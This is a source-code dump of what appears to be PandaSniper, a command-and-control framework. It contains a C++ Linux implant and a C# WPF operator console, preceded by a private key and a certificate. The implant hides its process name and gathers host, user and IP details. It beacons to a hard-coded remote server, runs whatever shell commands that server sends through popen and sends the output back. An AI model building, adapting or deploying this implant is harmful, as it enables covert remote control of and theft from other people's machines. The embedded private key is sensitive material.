5MbAcwvrGGjqW0h3Nf4ajw44x9+tr63Fz0MrchzON6B4dzC5zDe5oaOC7w6tAkEA 12 | gQGn7tTh/JlHKZOnGSywKaZPrsyAbgr/BDiAmFOeDXpZmC8PyYv//gkeIv2VCIBv 13 | m59lNt/balaTl7BH5hpKlwJAIzZbZmd4IQRcNarXyJb0UCdKp8Wn+HAa/N1lRA9P 14 | tg5LfJL1PXm/EzjhyVRrlWGufW0ihoqCYx91MjamOLyu7w== 15 | -----END PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /Agent/ca.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIB7TCCAVagAwIBAgICBnUwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEChMHVGVz 3 | dCBDbzAeFw0yMDAyMDUwODI2NDFaFw0zMDAyMDUwODI2NDFaMBIxEDAOBgNVBAoT 4 | B1Rlc3QgQ28wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMyCTLosNRk9lrUK 5 | Z8OOdvKh1e2RlZ31wbtXbMWhSX+ogaXHZUN79Qz3xxglMxCW0SJ/DPaz4OoH+OAO 6 | zrK7wz7Ny+0xy5tAyLzFVN3kQXHDiWyOkxKHoJMuNQRja5NiowQ3rtZ91B/SR6GZ 7 | XMxhpgoq8z2CBfE80mtUeIwNEoCNAgMBAAGjUjBQMA4GA1UdDwEB/wQEAwIChDAd 8 | BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDwYDVR0TAQH/BAUwAwEB/zAO 9 | BgNVHQ4EBwQFAQIDBAUwDQYJKoZIhvcNAQELBQADgYEAvdYniOY+ydbuKmruihKL 10 | dBShBnepDznHTXXgQ5+Kf2p7mhFlQuetPhupb00OvN2Iz1AJFSulLF9fQz6P4Dui 11 | HhaEWLlu9dFHnEA/P4okixqFUZK00RkA9O7z4Lo29083eUFZBmTqAysuzsLBcndu 12 | Usi0/QV2wu8b+nVGVhS7YBU= 13 | -----END CERTIFICATE----- 14 | -------------------------------------------------------------------------------- /Implant/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/QAX-A-Team/PandaSniper/6e838a68bfcece23772b696ea811fa33096c2366/Implant/.DS_Store -------------------------------------------------------------------------------- /Implant/main.cpp: -------------------------------------------------------------------------------- 1 | 2 | /* 3 | 4 | #define PROC_NAME "testprocess" 伪造的进程名字 5 | int Heartbeat_time = 2; //心跳时间 6 | 7 | apt-get install libcurl4-gnutls-dev 8 | gcc main.cpp -lcurl -lstdc++ -lpthread 9 | 10 | */ 11 | 12 | 13 | 14 | #include 15 | #include 16 | #include 17 | 
#include 18 | #include 19 | #include 20 | 21 | #include 22 | #include 23 | 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | 30 | #include // threads 31 | #include // queue 32 | #include //uname 33 | 34 | #include 35 | #include 36 | #include 37 | 38 | std::queue worker_queue; // task queue: filled by Heartbeat with /cmd responses, drained by exec_work 39 | 40 | 41 | #define MAXLINE 102400 42 | 43 | char infotype[MAXLINE] = "0"; 44 | char cmdtype[MAXLINE] = "1"; 45 | 46 | #define PROC_NAME "testprocess" // name written over argv[0] in main() 47 | char serverip[MAXLINE] = "http://116.62.132.31:8081"; // hard-coded server base URL, plain HTTP; Heartbeat and exec_work send all of their requests to it 48 | //char serverip[MAXLINE] = "http://127.0.0.1"; 49 | int Heartbeat_time = 5; // heartbeat interval in seconds, default 5 50 | 51 | 52 | 53 | 54 | // Get the internal IP: writes the first IPv4 interface address that is not 127.0.0.1 into ip. Always returns 0. 55 | int getip(char ip[1024]) { 56 | struct ifaddrs* ifAddrStruct = NULL; 57 | struct ifaddrs* ifa = NULL; 58 | void* tmpAddrPtr = NULL; 59 | 60 | getifaddrs(&ifAddrStruct); 61 | 62 | for (ifa = ifAddrStruct; ifa != NULL; ifa = ifa->ifa_next) { 63 | if (!ifa->ifa_addr) { 64 | continue; 65 | } 66 | if (ifa->ifa_addr->sa_family == AF_INET) { // check it is IP4 67 | // is a valid IP4 Address 68 | tmpAddrPtr = &((struct sockaddr_in*)ifa->ifa_addr)->sin_addr; 69 | char addressBuffer[INET_ADDRSTRLEN]; 70 | 71 | inet_ntop(AF_INET, tmpAddrPtr, addressBuffer, INET_ADDRSTRLEN); 72 | 73 | char f[MAXLINE];// filter value 74 | sprintf(f, "127.0.0.1"); 75 | 76 | if (strcmp(addressBuffer, f) == 0) {// skip 127.0.0.1 77 | continue; 78 | } 79 | sprintf(ip, addressBuffer); 80 | return 0; 81 | } 82 | 83 | 84 | } 85 | return 0; 86 | } 87 | 88 | 89 | std::string string_to_hex(const std::string& input) // returns two uppercase hex digits per byte of input 90 | { 91 | static const char hex_digits[] = "0123456789ABCDEF"; 92 | 93 | std::string output; 94 | output.reserve(input.length() * 2); 95 | for (unsigned char c : input) 96 | { 97 | output.push_back(hex_digits[c >> 4]); 98 | output.push_back(hex_digits[c & 15]); 99 | } 100 | return output; 101 | } 102 | 103 | int _getuid() { // returns rand() after seeding with the current time; the value becomes the global uid below 104 | srand(time(0)); 105 | int uid; 106 | uid = rand(); 107 | return uid; 108 | } 109 | 110 | int uid = _getuid(); 111 | 112 | 113 | 114 | // Trim leading and trailing whitespace 115 | 
std::string trimstr(std::string s) { 116 | size_t n = s.find_last_not_of(" \r\n\t"); 117 | if (n != std::string::npos) { 118 | s.erase(n + 1, s.size() - n); 119 | } 120 | n = s.find_first_not_of(" \r\n\t"); 121 | if (n != std::string::npos) { 122 | s.erase(0, n); 123 | } 124 | return s; 125 | } 126 | 127 | 128 | // Command execution: runs cmd through popen(), reads its output with a single fread() of at most MAXLINE bytes and copies it into result as a C string. Always returns 1. 129 | int cmd_exec(char *cmd,char *result) { 130 | 131 | FILE* stream; 132 | char buf[MAXLINE]; 133 | 134 | memset(buf, '\0', sizeof(buf)); 135 | stream = popen(cmd, "r"); 136 | 137 | fread(buf, sizeof(char), sizeof(buf), stream); 138 | 139 | 140 | sprintf(result, "%s",buf); 141 | 142 | pclose(stream); 143 | 144 | 145 | return 1; 146 | } 147 | 148 | 149 | // libcurl write callback: appends each received chunk to the std::string passed as userp 150 | size_t WriteCallback(char* contents, size_t size, size_t nmemb, void* userp) 151 | { 152 | ((std::string*)userp)->append((char*)contents, size * nmemb); 153 | return size * nmemb; 154 | } 155 | 156 | 157 | 158 | // HTTP helper: POSTs send_postdata to server + uri with libcurl and writes the trimmed response body into recv_data. Always returns 0; the result of curl_easy_perform is not checked. The request body, URL and response are printed to stdout. 159 | int get_response(char* server,char* uri,char* send_postdata,char* recv_data) { 160 | 161 | printf("[send] %s\n", send_postdata); 162 | curl_global_init(CURL_GLOBAL_ALL); 163 | 164 | CURL* easyhandle = curl_easy_init(); 165 | std::string readBuffer; 166 | 167 | char url[MAXLINE]; 168 | sprintf(url, "%s%s", server, uri); 169 | 170 | printf("request url %s\n", url); 171 | 172 | curl_easy_setopt(easyhandle, CURLOPT_URL, url); 173 | /* 10-second timeout */ 174 | curl_easy_setopt(easyhandle, CURLOPT_TIMEOUT, 10L); 175 | /* POST body */ 176 | curl_easy_setopt(easyhandle, CURLOPT_POSTFIELDS, send_postdata); 177 | curl_easy_setopt(easyhandle, CURLOPT_VERBOSE, 0L); 178 | curl_easy_setopt(easyhandle, CURLOPT_WRITEFUNCTION, WriteCallback); 179 | curl_easy_setopt(easyhandle, CURLOPT_WRITEDATA, &readBuffer); 180 | 181 | curl_easy_perform(easyhandle); 182 | readBuffer = trimstr(readBuffer);// trim whitespace around the HTTP response 183 | char* http_response = (char*)readBuffer.data(); 184 | 185 | 186 | sprintf(recv_data, "%s",http_response); 187 | 188 | printf("[recv] %s\n\n", recv_data); 189 | return 0; 190 
| } 191 | 192 | 193 | // Heartbeat loop: every Heartbeat_time seconds POSTs info to /status, then follows up with /info when the reply is "0" or with /cmd when it is "1"; a /cmd response is pushed onto worker_queue. These fixed paths and the regular interval are the request pattern this file produces on the network. 194 | int Heartbeat(char* info) { 195 | 196 | while (true) 197 | { 198 | char type[1024]; 199 | // printf("Http Send request -> %s\n", info); 200 | get_response(serverip,(char *)"/status",info, type); 201 | 202 | 203 | if (strcmp(infotype,type)==0) {// type 0: go to info 204 | char cmd[MAXLINE]; 205 | printf("go to info [%s]\n", type); 206 | get_response(serverip,(char*)"/info", info, cmd);// fetch the response 207 | //printf("Get cmd -> %s\n\n\n", cmd); 208 | 209 | } 210 | else if (strcmp(cmdtype, type) == 0) { 211 | printf("go to cmd [%s]\n", type); 212 | char cmd[MAXLINE]; 213 | get_response(serverip,(char*)"/cmd", info, cmd);// fetch the response 214 | //printf("Get cmd -> %s\n\n\n", cmd); 215 | worker_queue.push(cmd); 216 | } 217 | 218 | sprintf(type, "999"); 219 | 220 | sleep(Heartbeat_time); 221 | 222 | } 223 | return 0; 224 | } 225 | 226 | // Worker loop: takes queued commands, runs each one through cmd_exec and POSTs the hex-encoded output to /cmdResult as a JSON object with "uid" and "result". 227 | int exec_work() { 228 | 229 | while (true) 230 | { 231 | 232 | char* text_queue; 233 | if (!worker_queue.empty()) { 234 | text_queue = worker_queue.front();// front(): the element that was pushed onto the queue earliest 235 | worker_queue.pop();// remove the first element of the queue 236 | 237 | 238 | //printf("Queue %s\n", text_queue); 239 | // run the command and collect its result 240 | char cmd_result[102400]; 241 | 242 | cmd_exec(text_queue, cmd_result); 243 | 244 | // hex-encode the command result (no newline stripping happens here) 245 | std::string tmp1= cmd_result; 246 | tmp1 = string_to_hex(tmp1); 247 | char* cmd_result1= (char*)tmp1.data(); 248 | 249 | 250 | char cmd_postdata[MAXLINE]; 251 | 252 | sprintf(cmd_postdata, "{\"uid\":\"%d\",\"result\":\"%s\"}", uid,cmd_result1); 253 | 254 | // send the command result 255 | char step_3_res[MAXLINE];// not used afterwards; only receives the response 256 | get_response(serverip,(char*)"/cmdResult", cmd_postdata, step_3_res); 257 | 258 | 259 | } 260 | sleep(0.1);// meant to poll the queue every 0.1 s; assuming POSIX sleep(unsigned int), 0.1 converts to 0 and the loop does not pause between polls 261 | } 262 | 263 | 264 | return 0; 265 | } 266 | 267 | 268 | // Replace every occurrence of toSearch in data with replaceStr 269 | void findAndReplaceAll(std::string& data, std::string toSearch, std::string replaceStr) 270 | { 271 | // Get the first occurrence 272 | size_t pos = data.find(toSearch); 273 | 274 | // Repeat 
till end is reached 275 | while (pos != std::string::npos) 276 | { 277 | // Replace this occurrence of Sub String 278 | data.replace(pos, toSearch.size(), replaceStr); 279 | // Get the next occurrence from the current position 280 | pos = data.find(toSearch, pos + replaceStr.size()); 281 | } 282 | } 283 | 284 | int main(int argc, char** argv) 285 | { 286 | 287 | // OS and CPU details from uname() 288 | struct utsname u; 289 | uname(&u); 290 | 291 | char osinfo[1024]; 292 | char cpuinfo[1024]; 293 | sprintf(osinfo, "%s %s %s ",u.sysname, u.nodename, u.release); 294 | sprintf(cpuinfo, "%s", u.machine); 295 | 296 | 297 | 298 | // change the process name: argv[0] is overwritten with PROC_NAME, so the command line shown for this process no longer reflects the executable that was started 299 | memset((void*)argv[0], '\0', strlen(argv[0])); 300 | strcpy(argv[0], PROC_NAME); 301 | 302 | char inter_ip[1024]; 303 | getip(inter_ip); 304 | 305 | 306 | // collect basic host information 307 | int pid = getpid(); 308 | char hostname[1024]; 309 | gethostname(hostname, 1024); 310 | 311 | char* current_user; 312 | current_user = getlogin(); 313 | 314 | char ip_json[1024]; 315 | get_response((char*)"https://api.myip.com",(char*)"", (char*)"", (char *)ip_json);// look up the external IP through a third-party service 316 | 317 | std::string ip = ip_json; 318 | findAndReplaceAll(ip, "\"","\\\""); 319 | sprintf(ip_json, (char*)ip.data()); 320 | 321 | char basic_information[MAXLINE]; 322 | 323 | 324 | // assemble the registration JSON: uid, a nested "data" string (hostname, user, cpuinfo, osinfo, pid, sleep_time), external ip and inner_ip 325 | sprintf(basic_information, "{\"uid\":\"%d\",\"data\":\"{\\\"hostname\\\":\\\"%s\\\",\\\"user\\\":\\\"%s\\\",\\\"cpuinfo\\\":\\\"%s\\\",\\\"osinfo\\\":\\\"%s\\\",\\\"pid\\\":\\\"%d\\\",\\\"sleep_time\\\":\\\"%d\\\"}\",\"ip\":\"%s\",\"inner_ip\":\"%s\"}", uid, hostname, current_user,cpuinfo,osinfo, pid, Heartbeat_time, ip_json, inter_ip); 326 | 327 | 328 | 329 | // heartbeat thread: sends heartbeats and queues the commands it receives 330 | std::thread threadObj1(Heartbeat, basic_information); 331 | threadObj1.detach();// runs concurrently 332 | 333 | 334 | std::thread threadObj2(exec_work); 335 | threadObj2.join(); 336 | return 0; 337 | } -------------------------------------------------------------------------------- /Master/PandaSniper.sln: 
-------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29613.14 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PandaSniper", "PandaSniper\PandaSniper.csproj", "{6EEAC8E1-443F-4934-91C3-0B806FA3DC0D}" 7 | EndProject 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MasterTest", "..\MasterTest\MasterTest.csproj", "{7312A575-6082-4625-8C95-3E3DAF1E51CC}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Release|Any CPU = Release|Any CPU 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {6EEAC8E1-443F-4934-91C3-0B806FA3DC0D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {6EEAC8E1-443F-4934-91C3-0B806FA3DC0D}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {6EEAC8E1-443F-4934-91C3-0B806FA3DC0D}.Release|Any CPU.ActiveCfg = Release|Any CPU 19 | {6EEAC8E1-443F-4934-91C3-0B806FA3DC0D}.Release|Any CPU.Build.0 = Release|Any CPU 20 | {7312A575-6082-4625-8C95-3E3DAF1E51CC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 21 | {7312A575-6082-4625-8C95-3E3DAF1E51CC}.Debug|Any CPU.Build.0 = Debug|Any CPU 22 | {7312A575-6082-4625-8C95-3E3DAF1E51CC}.Release|Any CPU.ActiveCfg = Release|Any CPU 23 | {7312A575-6082-4625-8C95-3E3DAF1E51CC}.Release|Any CPU.Build.0 = Release|Any CPU 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {691F221C-2380-4008-BCE8-621BFC771CCF} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Master/PandaSniper/AddListener.xaml.cs: -------------------------------------------------------------------------------- 1 | 
using Newtonsoft.Json; 2 | using Newtonsoft.Json.Linq; 3 | using System; 4 | using System.Collections.Generic; 5 | using System.Collections.ObjectModel; 6 | using System.Linq; 7 | using System.Net.Security; 8 | using System.Text; 9 | using System.Threading.Tasks; 10 | using System.Windows; 11 | using System.Windows.Controls; 12 | using System.Windows.Data; 13 | using System.Windows.Documents; 14 | using System.Windows.Input; 15 | using System.Windows.Media; 16 | using System.Windows.Media.Imaging; 17 | using System.Windows.Shapes; 18 | 19 | namespace PandaSniper 20 | { 21 | /// 22 | /// AddListener.xaml 的交互逻辑 23 | /// 24 | public partial class AddListener : Window 25 | { 26 | 27 | public ObservableCollection listeners; 28 | public delegate void TransfDelegate(ObservableCollection listeners); 29 | public UserProfile userProfile; 30 | 31 | public event TransfDelegate TransfEvent; 32 | 33 | public AddListener() 34 | { 35 | InitializeComponent(); 36 | } 37 | 38 | private void AddListenerWindow_Loaded(object sender, RoutedEventArgs e) 39 | { 40 | 41 | } 42 | 43 | private void WindowTitle_MouseMove(object sender, MouseEventArgs e) 44 | { 45 | if (e.LeftButton == MouseButtonState.Pressed) 46 | { 47 | this.DragMove(); 48 | } 49 | } 50 | private void WindowClose_MouseEnter(object sender, MouseEventArgs e) 51 | { 52 | 53 | this.WindowCloseIcon.Visibility = Visibility.Visible; 54 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 55 | } 56 | private void WindowClose_MouseLeave(object sender, MouseEventArgs e) 57 | { 58 | 59 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 60 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 61 | } 62 | private void WindowMinSize_MouseEnter(object sender, MouseEventArgs e) 63 | { 64 | 65 | this.WindowCloseIcon.Visibility = Visibility.Visible; 66 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 67 | } 68 | private void WindowMinSize_MouseLeave(object sender, MouseEventArgs e) 69 | { 70 | 
this.WindowCloseIcon.Visibility = Visibility.Hidden; 71 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 72 | } 73 | private void WindowMaxSize_MouseEnter(object sender, MouseEventArgs e) 74 | { 75 | 76 | this.WindowCloseIcon.Visibility = Visibility.Visible; 77 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 78 | } 79 | private void WindowMaxSize_MouseLeave(object sender, MouseEventArgs e) 80 | { 81 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 82 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 83 | } 84 | private void WindowClose_Click(object sender, RoutedEventArgs e) 85 | { 86 | this.Close(); 87 | } 88 | private void WindowMinSize_Click(object sender, RoutedEventArgs e) 89 | { 90 | this.WindowState = WindowState.Minimized; 91 | } 92 | 93 | 94 | private void HttpHostsListBox_PreviewMouseUp(object sender, MouseButtonEventArgs e) 95 | { 96 | 97 | } 98 | 99 | private void AddListenerSave_MouseEnter(object sender, MouseEventArgs e) 100 | { 101 | 102 | } 103 | 104 | private void AddListenerSave_MouseLeave(object sender, MouseEventArgs e) 105 | { 106 | 107 | } 108 | 109 | private void AddListenerSave_Click(object sender, RoutedEventArgs e) 110 | { 111 | string hosts = ""; 112 | foreach (ListBoxItem listBoxItem in HttpHostsListBox.Items) 113 | { 114 | if(hosts == "") 115 | { 116 | hosts = listBoxItem.DataContext.ToString(); 117 | } 118 | else 119 | { 120 | hosts = hosts + "," + listBoxItem.DataContext.ToString(); 121 | } 122 | 123 | } 124 | ListenersListView listener = new ListenersListView 125 | { 126 | name = ListenerName.Text, 127 | payload = ListenerPayload.Text, 128 | hosts = hosts, 129 | stagerHost = HttpHostStager.Text, 130 | port = HttpPortC2.Text, 131 | bindto = HttpPortBind.Text, 132 | header = HttpHostHeader.Text, 133 | proxy = HttpProxy.Text, 134 | profile = ListenerProfile.Text 135 | }; 136 | 137 | if ("" == listener.name) 138 | { 139 | MessageBox.Show("name is empty"); 140 | return; 141 | } 142 | else if ("" == 
listener.port) 143 | { 144 | MessageBox.Show("port is empty"); 145 | return; 146 | } 147 | 148 | bool isE = false; 149 | foreach (ListenersListView listenerFormat in this.listeners) 150 | { 151 | if (listenerFormat.name == listener.name) 152 | { 153 | MessageBox.Show("name is exits"); 154 | return; 155 | } 156 | else if (listenerFormat.port == listener.port) 157 | { 158 | MessageBox.Show("port is exits"); 159 | return; 160 | } 161 | else 162 | { 163 | isE = true; 164 | } 165 | } 166 | if (this.listeners.Count == 0 || isE) 167 | { 168 | this.listeners.Add(listener); 169 | DataFormat MessageData; 170 | MessageData.type = "3"; 171 | MessageData.token = userProfile.token; 172 | MessageData.data = new Dictionary { { "port", listener.Port } }; 173 | string sendMessage = JsonConvert.SerializeObject(MessageData); 174 | SslTcpClient sslTcpClient = new SslTcpClient(userProfile.host, int.Parse(userProfile.port), "localhost"); 175 | sslTcpClient.StartSslTcp(); 176 | SslStream sslStream = sslTcpClient.SendMessage(sendMessage); 177 | sslTcpClient.ReadMessage(sslStream); 178 | 179 | JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage); 180 | if (rMJson["code"].ToString() == "200") 181 | { 182 | MessageBox.Show("监听成功"); 183 | } 184 | else 185 | { 186 | MessageBox.Show(rMJson["error"].ToString()); 187 | sslTcpClient.CloseSslTcp(); 188 | return; 189 | } 190 | sslTcpClient.CloseSslTcp(); 191 | } 192 | 193 | this.TransfEvent(this.listeners);//触发事件 194 | this.Close(); 195 | } 196 | 197 | private void AddListenerClose_MouseEnter(object sender, MouseEventArgs e) 198 | { 199 | 200 | } 201 | 202 | private void AddListenerClose_MouseLeave(object sender, MouseEventArgs e) 203 | { 204 | 205 | } 206 | 207 | private void AddListenerClose_Click(object sender, RoutedEventArgs e) 208 | { 209 | this.Close(); 210 | } 211 | 212 | private void AddHttpHost_MouseEnter(object sender, MouseEventArgs e) 213 | { 214 | 215 | } 216 | 217 | private void 
AddHttpHost_MouseLeave(object sender, MouseEventArgs e) 218 | { 219 | 220 | } 221 | 222 | private void AddHttpHost_Click(object sender, RoutedEventArgs e) 223 | { 224 | 225 | } 226 | 227 | private void RemoveHttpHost_MouseEnter(object sender, MouseEventArgs e) 228 | { 229 | 230 | } 231 | 232 | private void RemoveHttpHost_MouseLeave(object sender, MouseEventArgs e) 233 | { 234 | 235 | } 236 | 237 | private void RemoveHttpHost_Click(object sender, RoutedEventArgs e) 238 | { 239 | 240 | } 241 | 242 | private void AddHttpProxy_MouseEnter(object sender, MouseEventArgs e) 243 | { 244 | 245 | } 246 | 247 | private void AddHttpProxy_MouseLeave(object sender, MouseEventArgs e) 248 | { 249 | 250 | } 251 | 252 | private void AddHttpProxy_Click(object sender, RoutedEventArgs e) 253 | { 254 | 255 | } 256 | } 257 | } 258 | -------------------------------------------------------------------------------- /Master/PandaSniper/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Master/PandaSniper/App.xaml: -------------------------------------------------------------------------------- 1 |  6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /Master/PandaSniper/App.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Configuration; 4 | using System.Data; 5 | using System.Linq; 6 | using System.Threading.Tasks; 7 | using System.Windows; 8 | 9 | namespace PandaSniper 10 | { 11 | /// 12 | /// App.xaml 的交互逻辑 13 | /// 14 | public partial class App : Application 15 | { 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /Master/PandaSniper/DataFormat.cs: 
-------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace PandaSniper 8 | { 9 | public struct DataFormat 10 | { 11 | public string type; 12 | public string token; 13 | public Dictionary data; 14 | } 15 | 16 | public struct ConfigFormat 17 | { 18 | public string id; 19 | public string ip; 20 | public DataConfigFormat data; 21 | } 22 | 23 | public struct DataConfigFormat 24 | { 25 | public string host; 26 | public string port; 27 | public string user; 28 | public string password; 29 | } 30 | 31 | public struct UserProfile 32 | { 33 | public string token; 34 | public string user; 35 | public string host; 36 | public string port; 37 | public string password; 38 | public SslTcpClient sslTcpClient; 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /Master/PandaSniper/DoubleBufferListView.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Reflection; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | using System.Windows.Controls; 8 | 9 | namespace PandaSniper 10 | { 11 | 12 | public static class DoubleBufferListView 13 | { 14 | /// 15 | /// 双缓冲,解决闪烁问题 16 | /// 17 | /// 18 | /// 19 | public static void DoubleBufferedListView(this ListView lv, bool flag) 20 | { 21 | Type lvType = lv.GetType(); 22 | PropertyInfo pi = lvType.GetProperty("DoubleBuffered", 23 | BindingFlags.Instance | BindingFlags.NonPublic); 24 | pi.SetValue(lv, flag, null); 25 | } 26 | 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/Function.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using 
System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace PandaSniper 8 | { 9 | public class Function 10 | { 11 | public static DateTime GetDateTime(string timeStamp) 12 | { // Converts a Unix timestamp in seconds (decimal string) to local time: appending "0000000" turns seconds into 100 ns ticks for TimeSpan. 13 | DateTime dtStart = TimeZone.CurrentTimeZone.ToLocalTime(new DateTime(1970, 1, 1)); 14 | long lTime = long.Parse(timeStamp + "0000000"); 15 | TimeSpan toNow = new TimeSpan(lTime); 16 | return dtStart.Add(toNow); 17 | } 18 | 19 | private static char[] constant = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z' }; 20 | /// 21 | /// Generates a random string over the characters 0-9 and a-z. Uses System.Random, which is not a cryptographic generator, so the result should not be relied on as a secret. 22 | /// 23 | /// Length of the string. 24 | /// The random string. 25 | public static string GenerateRandomString(int length) 26 | { 27 | string checkCode = String.Empty; 28 | Random rd = new Random(); 29 | for (int i = 0; i < length; i++) 30 | { 31 | checkCode += constant[rd.Next(36)].ToString(); 32 | } 33 | return checkCode; 34 | } 35 | 36 | public static string GetChsFromHex(string hex) 37 | { 38 | 39 | if (hex.Length % 2 != 0) 40 | { 41 | hex += "20";// "20" is a hex-encoded space; NOTE(review): appending two characters keeps an odd length odd, so the last input digit ends up paired with the '2' 42 | //throw new ArgumentException("hex is not a valid number!", "hex"); 43 | } 44 | 45 | // Convert hex into a byte array. 46 | byte[] bytes = new byte[hex.Length / 2]; 47 | 48 | for (int i = 0; i < bytes.Length; i++) 49 | { 50 | try 51 | { 52 | // Every two characters form one byte. 53 | bytes[i] = byte.Parse(hex.Substring(i * 2, 2), 54 | System.Globalization.NumberStyles.HexNumber); 55 | } 56 | catch 57 | { 58 | // Rethrow an exception with custom message. 
59 | throw new ArgumentException("hex is not a valid hex number!", "hex"); 60 | } 61 | } 62 | 63 | // 获得 GB2312,Chinese Simplified。 64 | Encoding chs = System.Text.Encoding.GetEncoding("UTF-8"); 65 | 66 | return chs.GetString(bytes); 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /Master/PandaSniper/LinuxExecutable.xaml: -------------------------------------------------------------------------------- 1 |  11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 29 | 30 | Linux Executable 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /Master/PandaSniper/LinuxExecutable.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// LinuxExecutable.xaml 的交互逻辑 20 | /// 21 | public partial class LinuxExecutable : Page 22 | { 23 | public LinuxExecutable() 24 | { 25 | InitializeComponent(); 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/LinuxExecutableS.xaml: -------------------------------------------------------------------------------- 1 |  10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Master/PandaSniper/LinuxExecutableS.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | 
using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// LinuxExecutableS.xaml 的交互逻辑 20 | /// 21 | public partial class LinuxExecutableS : Page 22 | { 23 | public LinuxExecutableS() 24 | { 25 | InitializeComponent(); 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/ListenersListView.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Linq; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | 8 | namespace PandaSniper 9 | { 10 | public class ListenersListView : INotifyPropertyChanged 11 | { 12 | public string name; 13 | public string payload; 14 | public string hosts; 15 | public string stagerHost; 16 | public string port; 17 | public string bindto; 18 | public string profile; 19 | public string header; 20 | public string proxy; 21 | public event PropertyChangedEventHandler PropertyChanged; 22 | 23 | public string Name 24 | { 25 | get 26 | { 27 | return name; 28 | } 29 | set 30 | { 31 | name = value; 32 | if (this.PropertyChanged != null) 33 | { 34 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Name")); 35 | } 36 | } 37 | } 38 | public string Payload 39 | { 40 | get 41 | { 42 | return payload; 43 | } 44 | set 45 | { 46 | payload = value; 47 | if (this.PropertyChanged != null) 48 | { 49 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Payload")); 50 | } 51 | } 52 | } 53 | public string Hosts 54 | { 55 | get 56 | { 57 | return hosts; 58 | } 59 | set 60 | { 61 
